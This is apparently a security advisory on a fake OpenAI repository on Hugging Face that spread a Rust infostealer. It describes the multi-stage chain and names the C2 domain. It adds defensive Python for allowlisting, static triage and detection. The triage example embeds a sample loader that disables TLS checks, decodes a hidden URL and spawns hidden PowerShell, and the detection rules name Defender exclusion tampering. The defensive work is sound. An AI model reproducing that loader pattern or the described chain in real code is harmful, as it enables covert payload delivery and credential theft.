Severity: HIGH (significant risk, prioritise patching) · Relevance: 8.2 · Frameworks: MITRE ATLAS, OWASP LLM Top 10

Fake OpenAI Repository on Hugging Face Delivers Rust-Based Infostealer

TL;DR (Severity: HIGH)
  • What happened: Typosquatted Hugging Face repo impersonating OpenAI delivered Rust infostealer to 244,000 downloaders.
  • Who's at risk: AI/ML developers and researchers who install models from Hugging Face without verifying repository authenticity are most exposed.
  • Act now:
    • Audit any recently installed Hugging Face packages, especially those referencing OpenAI projects
    • Implement code review of loader scripts before executing any downloaded ML repository files
    • Enforce allowlists for trusted Hugging Face organisations and verify model card authenticity before download
Overview

A threat actor created a fraudulent Hugging Face repository named Open-OSS/privacy-filter that typosquatted OpenAI’s legitimate ‘Privacy Filter’ project. Discovered by HiddenLayer researchers on May 7, 2026, the repository briefly reached the #1 spot on Hugging Face’s trending list and recorded approximately 244,000 downloads before the platform removed it following reports. The campaign demonstrates how adversaries are actively exploiting the trust and discoverability mechanics of AI model-sharing platforms to distribute malware at scale.
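The repository name in this incident (Open-OSS/privacy-filter) passes a casual glance because it shares a prefix with the real organisation. The following is an added example, not code from HiddenLayer or Hugging Face, of an organisation allowlist gate that a download wrapper could apply before fetching a repository: exact organisation matches are allowed, everything else is refused, and refused names are additionally compared against the allowlist (normalised to lowercase alphanumerics, then edit distance and shared-prefix length) so the refusal message says which trusted organisation the name resembles. The allowlist contents, the thresholds and the repository ids used for illustration are assumptions.

```python
import re
from dataclasses import dataclass

# Assumption: an organisation allowlist maintained by the defending team.
TRUSTED_ORGS = {"openai", "meta-llama", "google", "microsoft", "mistralai"}


@dataclass(frozen=True)
class Decision:
    repo_id: str
    allowed: bool
    reason: str


def _normalise(name: str) -> str:
    """Lowercase and strip separators so 'Open-OSS' and 'open_oss' compare equal."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


def _levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _common_prefix(a: str, b: str) -> int:
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def lookalike_of(org: str, trusted=TRUSTED_ORGS):
    """Return the trusted organisation this name most resembles, or None.

    Thresholds (assumed): edit distance <= 2, or a shared prefix of >= 4 characters.
    """
    candidate = _normalise(org)
    best = None
    for t in trusted:
        tn = _normalise(t)
        if candidate == tn:
            continue
        dist = _levenshtein(candidate, tn)
        if dist <= 2 or _common_prefix(candidate, tn) >= 4:
            if best is None or dist < best[1]:
                best = (t, dist)
    return best[0] if best else None


def gate_repo(repo_id: str, trusted=TRUSTED_ORGS) -> Decision:
    """Allow only repositories owned by an allowlisted organisation."""
    if "/" not in repo_id:
        return Decision(repo_id, False, "repo id carries no organisation")
    org, _name = repo_id.split("/", 1)
    if org.lower() in {t.lower() for t in trusted}:
        return Decision(repo_id, True, f"organisation '{org}' is allowlisted")
    sibling = lookalike_of(org, trusted)
    if sibling:
        return Decision(repo_id, False,
                        f"organisation '{org}' is not allowlisted and resembles '{sibling}'")
    return Decision(repo_id, False, f"organisation '{org}' is not allowlisted")


if __name__ == "__main__":
    # Constructed repository ids; "openai/example-model" is a placeholder, not a real repo.
    for rid in ("openai/example-model", "Open-OSS/privacy-filter", "0penai/whisper-clone"):
        d = gate_repo(rid)
        print(f"{rid}: {'ALLOW' if d.allowed else 'BLOCK'} ({d.reason})")
```

The gate is deliberately allowlist-first: the lookalike comparison never grants access, it only explains a refusal so the analyst reviewing a blocked download sees the likely impersonation target immediately.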

Technical Analysis

The attack employed a multi-stage delivery chain designed to evade detection:

  1. Lure Layer: The repository copied OpenAI’s legitimate model card nearly verbatim, presenting a convincing facade to researchers and developers browsing trending AI tools.

  2. Loader Script (loader.py): A Python file included superficial AI-related code for camouflage. Behind this facade, it:
    • Disabled SSL certificate verification
    • Decoded a base64-encoded URL pointing to an external resource
    • Fetched and executed a JSON payload containing an embedded PowerShell command

  3. PowerShell Stage: Executed silently in a hidden window, the command downloaded start.bat, which:
    • Performed privilege escalation
    • Downloaded the final payload (sefirah)
    • Added the payload to Microsoft Defender’s exclusion list
    • Executed the payload

  4. Final Payload — Rust Infostealer (sefirah): A capable Rust-based credential harvester targeting:
    • Browser data (cookies, passwords, session tokens, encryption keys) from Chromium and Gecko browsers
    • Discord tokens, local databases, and master keys
    • Cryptocurrency wallets and wallet browser extensions
    • SSH, FTP, and VPN credentials including FileZilla configurations
    • Sensitive local files and wallet seeds/keys
    • System information and multi-monitor screenshots

Stolen data is compressed and exfiltrated to a C2 server at recargapopular[.]com. The malware also incorporates extensive anti-analysis capabilities, including VM, sandbox, and debugger detection.
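None of the loader behaviours listed above (TLS verification switched off, a base64-decoded URL, a child PowerShell process) belongs in a script whose stated job is to load a model, which makes them good static review criteria. The following is an added example, not code from HiddenLayer or from the repository in question, of an AST-based triage pass that a reviewer can run over a downloaded loader.py before executing it; it also serves the "Process" recommendation below. The fixture script is constructed for this example and is only parsed, never run: its base64 string decodes to a non-routable placeholder URL and the PowerShell argument is a placeholder. The rule set and the risk thresholds are assumptions.

```python
import ast
from dataclasses import dataclass

# Constructed fixture: a loader-style script carrying the indicators described in the
# analysis. It is parsed only; nothing in it is executed by this example.
SAMPLE_LOADER = '''import base64, ssl, subprocess, urllib.request

ctx = ssl._create_unverified_context()
url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv").decode()
data = urllib.request.urlopen(url, context=ctx).read()
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command", "<placeholder>"])
'''


@dataclass(frozen=True)
class Finding:
    line: int
    category: str
    detail: str


# Calls that are hard to justify in a model loader: name -> (category, description).
CALL_RULES = {
    "_create_unverified_context": ("tls_bypass", "SSL certificate verification disabled"),
    "b64decode": ("obfuscation", "base64-decoded embedded data (possible hidden URL or payload)"),
    "exec": ("dynamic_exec", "dynamic execution of generated code"),
    "eval": ("dynamic_exec", "dynamic evaluation of generated code"),
}
PROCESS_FUNCS = {"Popen", "run", "call", "check_output", "check_call", "system", "popen", "startfile"}
# Substrings in string literals that point at a hidden PowerShell stage or Defender tampering.
STRING_MARKERS = {
    "powershell": ("process_spawn", "PowerShell referenced in a string literal"),
    "windowstyle": ("evasion", "hidden-window flag referenced"),
    "hidden": ("evasion", "hidden-window flag referenced"),
    "exclusionpath": ("evasion", "Defender exclusion referenced"),
}


def _callee(node: ast.Call) -> tuple[str, str]:
    """Return (owner, attr) for owner.attr(...), or ("", name) for a bare name(...)."""
    f = node.func
    if isinstance(f, ast.Attribute):
        owner = f.value.id if isinstance(f.value, ast.Name) else ""
        return owner, f.attr
    if isinstance(f, ast.Name):
        return "", f.id
    return "", ""


def triage_loader(source: str) -> list[Finding]:
    """Walk the AST of a downloaded script and collect review findings, ordered by line."""
    findings: list[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            owner, name = _callee(node)
            if name in CALL_RULES:
                findings.append(Finding(node.lineno, *CALL_RULES[name]))
            if owner in {"subprocess", "os"} and name in PROCESS_FUNCS:
                findings.append(Finding(node.lineno, "process_spawn", f"child process via {owner}.{name}"))
            for kw in node.keywords:  # requests.get(..., verify=False) and similar
                if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                    findings.append(Finding(node.lineno, "tls_bypass", "verify=False on HTTP request"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            low = node.value.lower()
            for marker, (category, detail) in STRING_MARKERS.items():
                if marker in low:
                    findings.append(Finding(node.lineno, category, f"{detail}: {node.value!r}"))
    return sorted(findings, key=lambda f: f.line)


def risk_level(findings: list[Finding]) -> str:
    """Assumed thresholds: three or more distinct categories is 'high', two 'medium', one 'low'."""
    categories = {f.category for f in findings}
    if len(categories) >= 3:
        return "high"
    if len(categories) == 2:
        return "medium"
    return "low" if categories else "clean"


if __name__ == "__main__":
    found = triage_loader(SAMPLE_LOADER)
    for f in found:
        print(f"line {f.line:>3}  {f.category:<14} {f.detail}")
    print("risk:", risk_level(found))
```

Scoring on distinct categories rather than raw hit counts keeps a single `subprocess.run` in an otherwise ordinary training script at "low", while the combination seen here (TLS bypass plus obfuscation plus a hidden PowerShell child) lands at "high" and should block execution pending manual review.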

Framework Mapping

  • AML.T0010 — ML Supply Chain Compromise: The attack directly targets the AI/ML development pipeline by weaponising a trusted model-sharing platform to distribute malicious packages.
  • AML.T0019 — Publish Poisoned Datasets/Repositories: The adversary published a poisoned repository with a near-identical model card to deceive users.
  • AML.T0047 — ML-Enabled Product or Service: The attack exploits user trust in legitimate AI tooling ecosystems.
  • LLM05 — Supply Chain Vulnerabilities: The incident is a textbook example of third-party AI component compromise through a trusted distribution channel.

Impact Assessment

With 244,000 downloads recorded before removal, the potential victim pool is significant. Any Windows user who installed and executed code from this repository may have had browser credentials, cryptocurrency assets, SSH/VPN configurations, and session tokens exfiltrated. The attack is particularly dangerous for AI researchers, MLOps engineers, and developers who routinely install packages from Hugging Face as part of their workflow and may not scrutinise loader scripts closely.

Mitigation & Recommendations

  • Immediate: Check systems for the presence of sefirah or related artefacts; rotate all credentials stored in affected browsers and SSH/VPN configurations.
  • Network: Block connections to recargapopular[.]com and monitor for outbound traffic to unknown C2 infrastructure.
  • Process: Establish code review requirements for any Python scripts (loader.py patterns) downloaded from ML repositories before execution.
  • Platform Hygiene: Only install models from verified organisations on Hugging Face; cross-reference repositories against official vendor GitHub/documentation links.
  • Detection: Deploy behavioural monitoring for PowerShell execution spawned from Python processes, particularly those running in hidden windows.
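The "Detection" recommendation above translates directly into a process-creation rule: a PowerShell image whose parent is a Python interpreter is unusual on its own and becomes a high-confidence signal when the command line requests a hidden window, an encoded command, or a Defender exclusion change. The following is an added example, not a HiddenLayer detection or a vendor rule, that runs that logic over constructed process-creation events flattened to key="value" pairs (field names follow the Sysmon Event ID 1 convention, which is an assumption about the telemetry source; the paths and command lines are invented).

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample telemetry (assumption: Sysmon Event ID 1-style field names).
SAMPLE_EVENTS = [
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -NoProfile -File C:\Scripts\backup.ps1"',
    r'ParentImage="C:\Users\dev\venv\Scripts\python.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell -WindowStyle Hidden -Command <placeholder>"',
    r'ParentImage="C:\Users\dev\venv\Scripts\python.exe" Image="C:\Program Files\PowerShell\7\pwsh.exe" CommandLine="pwsh -NoProfile -File train.ps1"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
PYTHON_PARENTS = {"python.exe", "pythonw.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)          # -WindowStyle Hidden / -w hidden
ENCODED_CMD_RE = re.compile(r"-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I)         # -EncodedCommand / -enc <base64>
DEFENDER_EXCL_RE = re.compile(r"add-mppreference|exclusionpath", re.I)       # Defender exclusion tampering


@dataclass(frozen=True)
class Alert:
    severity: str
    reasons: tuple
    command_line: str


def parse_event(line: str) -> dict:
    """Turn one key="value" telemetry line into a dict."""
    return dict(FIELD_RE.findall(line))


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[Alert]:
    """Return an Alert when PowerShell is spawned by a Python interpreter, else None."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    if parent not in PYTHON_PARENTS or image not in POWERSHELL_IMAGES:
        return None
    cmd = event.get("CommandLine", "")
    reasons = ["PowerShell spawned by a Python interpreter"]
    severity = "medium"  # worth a look even with a plain command line
    if HIDDEN_WINDOW_RE.search(cmd):
        reasons.append("hidden window requested")
        severity = "high"
    if ENCODED_CMD_RE.search(cmd):
        reasons.append("encoded command")
        severity = "high"
    if DEFENDER_EXCL_RE.search(cmd):
        reasons.append("Defender exclusion manipulation")
        severity = "critical"
    return Alert(severity, tuple(reasons), cmd)


def scan(lines) -> list:
    """Evaluate every telemetry line and keep only the events that alert."""
    return [a for a in (evaluate(parse_event(line)) for line in lines) if a is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.severity.upper()}] {'; '.join(alert.reasons)} :: {alert.command_line}")
```

The third sample event (pwsh launched from Python to run a training script) still produces a medium alert; in a research environment that pairing may be legitimate, so the rule leaves the severity low enough for triage rather than suppressing it, while the hidden-window variant from the incident is escalated on its own.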
